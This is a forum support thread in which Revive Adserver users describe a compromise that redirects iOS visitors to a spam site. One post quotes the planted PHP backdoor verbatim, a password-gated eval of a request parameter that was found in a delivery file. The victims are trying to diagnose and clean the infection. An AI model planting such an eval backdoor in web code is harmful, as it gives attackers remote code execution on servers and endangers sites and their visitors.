Snaggy

OK thanks Matteo! Q. Where would I look to find log data to see when this file was modified?

My genericText.delivery file has this line... if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='6f3ba4fbec5bfe3817fc319f3031fdaa'){@eval($_REQUEST['zoneId']);} ?> I take it that this should be deleted?

I discovered the same thing... code has been prepended in rv_zones, with the same code as sunech.

Hi sunech, sorry to hear about your similar problems, it's a real headache, isn't it. ? I haven't had time yet to dive in, but hopefully in the next day or so.

Thanks Ian vM, I much appreciate that.

yes, I have full access to the server and MySQL database. I haven't found anything suspicious yet on the server, and haven't had time to look at the database. I'm still gathering info on what might be the issue, and what can be done. I'm assuming the database has been compromised, especially after reading those articles.

Yes always 4.1.3, with very strong passwords on the database, and admin accounts. ?

On pages without the Revive code, things are normal. With it, the attack occurs. Changing the name of the Revive folder immediately stops the attack on every affected page. I found some links on this: How to Clean Your Hacked OpenX/Revive Adserver and What to do when you suspect your OpenX Source system has been hacked - Revive Support

Revive Adserver 4.1.3

Hi folks. We've been using Revive ads on our website for many months now, with no problems, but yesterday all of our iOS traffic was hijacked by a rogue spam script of some kind. It only occurred on iOS devices, like iPads and iPhones, not Macs. (I didn't have Android or Windows to test those out) The page loads, but then a pop-up appears, closing it, sends you to a spam/malware site (mobile2018newmine.pw). I turned off all our campaigns but the attack still occurred. The only thing that stops it is either removing the Revise code from a page, or what I did, changing the folder name of the Revise ads, which stopped the attack from launching. This of course also stops all of our ads too, but better that, than subject our traffic to the hijack. Any ideas as to how I can fix this? I'm thinking our SQL server was compromised? I'm not sure what else would cause this, and I want to prevent this from happening in the future. Suggestions would be appreciated. Thanks in advance!